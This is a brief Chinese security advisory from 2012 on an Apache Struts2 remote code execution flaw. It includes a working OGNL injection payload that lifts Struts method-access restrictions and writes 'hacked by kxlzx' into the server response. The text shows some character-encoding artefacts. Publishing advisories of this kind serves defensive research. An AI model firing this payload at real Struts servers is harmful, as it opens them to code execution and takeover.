Apache Struts2 Skill名稱遠程代碼執(zhí)行漏洞 |
發(fā)布時間: 2012/9/8 16:08:54 |
發(fā)布日期:2012-08-23 受影響系統(tǒng): - Apache Struts是一款開發(fā)Java Web應用程序的開源Web應用框架。 Apache Struts在實現(xiàn)上存在安全漏洞,攻擊者可利用此漏洞在網(wǎng)絡服務器進程中運行上傳的腳本代碼,導致非法訪問或權限提升。 <*來源:kxlzx 測試方法: 警 告 以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負! kxlzx ()提供了如下測試方法: %{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())} 建議: Apache Group
本文出自:億恩科技【www.allwellnessguide.com】 |